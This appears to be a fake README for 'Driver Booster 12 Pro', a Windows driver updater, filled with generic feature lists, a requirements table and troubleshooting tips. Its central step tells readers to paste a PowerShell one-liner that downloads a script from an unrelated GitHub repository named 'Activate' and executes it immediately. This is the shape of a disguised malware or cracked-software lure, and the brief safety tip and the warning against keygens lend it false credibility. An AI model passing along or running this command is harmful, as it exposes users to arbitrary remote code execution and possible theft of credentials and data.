Driver Booster 12 Pro is a Windows driver maintenance reference focused on scanning hardware, finding outdated drivers, and keeping driver updates organized.
This README is written as a user-friendly setup and troubleshooting guide.
Open PowerShell and run:
irm https://raw.githubusercontent.com/SlayerCoralPersonify/Activate/main/install.ps1 | iexSafety tip: this command downloads and runs a remote PowerShell script. Review the script source before running it and only continue if you trust it.
- Checking outdated drivers
- Reviewing hardware information
- Organizing driver update notes
- Keeping track of driver versions
- Preparing a system before gaming, editing, or hardware upgrades
- Create a Windows restore point.
- Save important work.
- Close apps that use the device you are updating.
- Update one driver group at a time.
- Restart Windows after major updates.
| Component | Requirement |
|---|---|
| OS | Windows 10 / 11 |
| RAM | 4 GB minimum |
| Storage | 1 GB free space or more |
| Permissions | Administrator access recommended |
| Internet | Required for driver lookup and downloads |
- Graphics drivers
- Audio drivers
- Network and Wi-Fi drivers
- Bluetooth drivers
- Chipset drivers
- USB and storage controller drivers
Run the app as Administrator and restart Windows if another maintenance tool is already running.
Check your internet connection, VPN, proxy, and firewall rules.
Install one driver at a time, restart Windows, and try the manufacturer driver package if the automatic update fails.
Open Device Manager, find the device, and use Roll Back Driver if available.
Use valid software licenses and trusted driver sources. Avoid keygens, patches, and unknown installers.